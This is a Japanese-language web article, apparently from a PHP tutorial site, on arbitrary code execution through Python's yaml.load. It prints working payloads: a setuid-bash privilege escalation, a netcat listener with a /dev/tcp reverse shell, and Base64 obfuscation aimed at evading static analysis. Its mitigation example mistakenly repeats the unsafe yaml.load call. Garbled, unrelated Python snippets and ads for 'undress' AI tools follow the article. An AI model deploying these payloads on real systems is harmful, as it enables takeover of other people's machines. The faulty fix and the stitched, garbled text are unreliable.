Python の YAML (YAML Ain't Markup Language) ライブラリには、特定の条件下で任意のコマンドの実行を可能にする脆弱性があることが確認されました。この脆弱性は、安全なローダーを指定せずに yaml.load 関数を使用することで発生します。デフォルトでは、yaml.load は任意の Python オブジェクトを実行でき、これにより悪意のあるペイロードに対する攻撃対象領域が作成されます。
任意のコマンド実行による悪用
根本的なリスクは逆シリアル化プロセスにあります。 YAML ドキュメントに悪意のあるペイロードが含まれている場合、yaml.load は埋め込まれたディレクティブを処理し、コードが実行される可能性があります。たとえば、次のスニペットを考えてみましょう:
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
ここで、yaml.load 関数は制限なしで example.yml を解析するため、YAML コンテンツに安全でないディレクティブが含まれている場合に脆弱になります。一般的なエクスプロイト ペイロードは、任意のシステム コマンドを実行するように作成される可能性があります。
ペイロードの例
import yaml from yaml import Loader, UnsafeLoader # Malicious payload payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' # Exploitation yaml.load(payload) yaml.load(payload, Loader=Loader) yaml.load(payload, Loader=UnsafeLoader)
これらの各呼び出しでペイロードが処理され、その結果、/tmp/bash に特権付き実行可能ファイルが作成されます。このバイナリは、昇格された特権で実行できます:
/tmp/bash -p
これは、権限が正しく設定されていないシステム上でこの脆弱性が悪用された場合、またはその他の弱点がある場合に権限昇格の可能性があることを示しています。
リバースシェルエクスプロイト
特に危険な使用例は、リバース シェルの脆弱性を利用することです。これにより、攻撃者はターゲット マシンにリモート アクセスできるようになります。このプロセスには、攻撃者のマシン上でリスナーを開始し、逆接続を確立するように設計された YAML ドキュメントを作成することが含まれます。
攻撃者のマシンで、Netcat リスナーを開始します。
nc -lvnp 1234
ターゲット システムで、root として次の Python スクリプトを実行します。
import yaml # Reverse shell payload data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]' yaml.load(data) # Executes the reverse shell
このペイロードは、ターゲット マシンに攻撃者のリスナーに接続し直すよう指示し、実行プロセスの権限を持つ完全に対話型のシェルを提供します。
難読化のためのBase64エンコーディング
基本的なセキュリティ制御またはフィルターをバイパスするには、ペイロードを Base64 でエンコードできます。この方法では難読化のレイヤーが追加され、静的分析ツールによる検出を回避できる可能性があります。
例
from base64 import b64decode import yaml # Base64-encoded payload encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity payload = b64decode(encoded_payload) # Execute the payload yaml.load(payload)
緩和手法
専門家は、このような脆弱性を排除するために厳密なコーディング手法を採用する必要があります。推奨される緩和策は次のとおりです:
-
セーフ ローダーの使用: yaml.load を yaml.safe_load に置き換えます。これにより、任意のオブジェクトの実行が防止されます。
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
入力ソースの制限: YAML 入力がサニタイズされ、信頼できるソースからのみ送信されていることを確認します。
静的分析の適用: ツールを使用して、安全でない yaml.load 呼び出しのコードベースをスキャンします。
環境強化: 悪用の影響を最小限に抑えるためにシステム権限を制限します。たとえば、コンテナ化された環境を使用すると、攻撃者が権限を昇格する能力が制限されます。
YAML ライブラリのデフォルトの動作は、Python などの動的型付け言語での逆シリアル化に関連するリスクを例示しています。この脆弱性の悪用には最小限の高度な技術が必要であり、安全なアプリケーション開発においては優先度の高い問題となります。これらのリスクを効果的に軽減するには、安全なコーディング手法を採用するとともに、堅牢な入力検証と実行時の安全対策が不可欠です。
以上がPython で YAML を使用する場合は注意してください。セキュリティ上の脆弱性がある可能性がありますの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

Tomergelistsinpython、あなたはオペレーター、extendmethod、listcomfulting、olitertools.chain、それぞれの特異的advantages:1)operatorissimplebutlessforlargelist;

Python 3では、2つのリストをさまざまな方法で接続できます。1)小さなリストに適したオペレーターを使用しますが、大きなリストには非効率的です。 2)メモリ効率が高い大規模なリストに適した拡張方法を使用しますが、元のリストは変更されます。 3)元のリストを変更せずに、複数のリストをマージするのに適した *オペレーターを使用します。 4)Itertools.chainを使用します。これは、メモリ効率が高い大きなデータセットに適しています。

Join()メソッドを使用することは、Pythonのリストから文字列を接続する最も効率的な方法です。 1)join()メソッドを使用して、効率的で読みやすくなります。 2)サイクルは、大きなリストに演算子を非効率的に使用します。 3)リスト理解とJoin()の組み合わせは、変換が必要なシナリオに適しています。 4)redoce()メソッドは、他のタイプの削減に適していますが、文字列の連結には非効率的です。完全な文は終了します。

pythonexexecutionistheprocessoftransforningpythoncodeintoexecutabletructions.1)interpreterreadSthecode、変換intobytecode、thepythonvirtualmachine(pvm)executes.2)theglobalinterpreeterlock(gil)管理委員会、

Pythonの主な機能には次のものがあります。1。構文は簡潔で理解しやすく、初心者に適しています。 2。動的タイプシステム、開発速度の向上。 3。複数のタスクをサポートするリッチ標準ライブラリ。 4.強力なコミュニティとエコシステム、広範なサポートを提供する。 5。スクリプトと迅速なプロトタイピングに適した解釈。 6.さまざまなプログラミングスタイルに適したマルチパラダイムサポート。

Pythonは解釈された言語ですが、コンパイルプロセスも含まれています。 1)Pythonコードは最初にBytecodeにコンパイルされます。 2)ByteCodeは、Python Virtual Machineによって解釈および実行されます。 3)このハイブリッドメカニズムにより、Pythonは柔軟で効率的になりますが、完全にコンパイルされた言語ほど高速ではありません。

useaforloopwhenteratingoverasequenceor foraspificnumberoftimes; useawhileloopwhentinuninguntinuntilaConditionismet.forloopsareidealforknownownownownownownoptinuptinuptinuptinuptinutionsituations whileoopsuitsituations withinterminedationations。

pythonloopscanleadtoErrorslikeinfiniteloops、ModifiningListsDuringiteration、Off-Oneerrors、Zero-dexingissues、およびNestededLoopinefficiencies.toavoidhese:1)use'i


ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

人気の記事

ホットツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

Safe Exam Browser
Safe Exam Browser は、オンライン試験を安全に受験するための安全なブラウザ環境です。このソフトウェアは、あらゆるコンピュータを安全なワークステーションに変えます。あらゆるユーティリティへのアクセスを制御し、学生が無許可のリソースを使用するのを防ぎます。

SublimeText3 英語版
推奨: Win バージョン、コードプロンプトをサポート!

PhpStorm Mac バージョン
最新(2018.2.1)のプロフェッショナル向けPHP統合開発ツール
